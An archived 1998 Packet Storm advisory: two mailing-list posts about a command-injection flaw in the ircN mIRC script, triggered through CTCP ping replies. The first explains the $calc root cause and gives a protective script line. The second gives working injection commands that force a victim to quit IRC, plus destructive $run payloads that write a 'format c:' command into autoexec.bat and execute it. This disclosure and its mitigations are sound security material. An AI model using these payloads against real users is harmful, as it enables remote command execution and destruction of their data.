ircn.txt

1999-08-17T00:00:00
ID PACKETSTORM:15187
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `  
Date: Thu, 23 Jul 1998 22:57:46 +0000  
From: Benoit Lefebvre <mox@SHELLZ.NETREVOLUTION.COM>  
Subject: Re: Backdoor in ircN, popular mIRC script.  
  
The bug is not only in ircN  
It is in mIRC.  
  
The problem is $calc(..)  
ircN is just one of the script who use $calc to check the ping delay  
eg: on 1:CTCPREPLY:PING*: { echo -a Ping reply: $calc($ctime - $2) }  
  
To protect yourself, add that to your script  
on 1:CTCPREPLY:PING*: { if ($2 !isnum) { halt } }  
  
--  
  
From tom@sensel.com Thu Jul 23 09:12:15 1998  
Date: Wed, 22 Jul 1998 23:02:37 -0400  
From: Tom <tom@sensel.com>  
Subject: Ircn Exploit..  
  
While looking around at IRCN (irc client).. I noticed a hole in the code  
which allowed people to run programs, make the ircn user quit off irc, etc..  
There isn't really much to say about it.. Here is how you do it..  
  
How to exploit bug:  
  
In a windows irc client type:  
/ctcpreply (nickname) ping $quit(i,am,owned)  
Result:  
*** ^DaWg^ (DaWg@cc576078-a.essx1.md.home.com) Quit (owned by nofear)  
  
For you unix users telnet to the irc server on port 6667 and type  
user bleh bleh bleh bleh bleh  
nick asdfksdjflk (this will be your nick.. Get creative)  
then type:  
notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)  
and bam!@#  
  
How to fix bug:  
in your ircn client type /events off  
  
There are a lot of nice little things you can do with this bug... here are a  
few..  
  
/ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)  
/ctcpreturn (nick) $run(c:\autoexec.bat)  
  
  
-NoFear  
`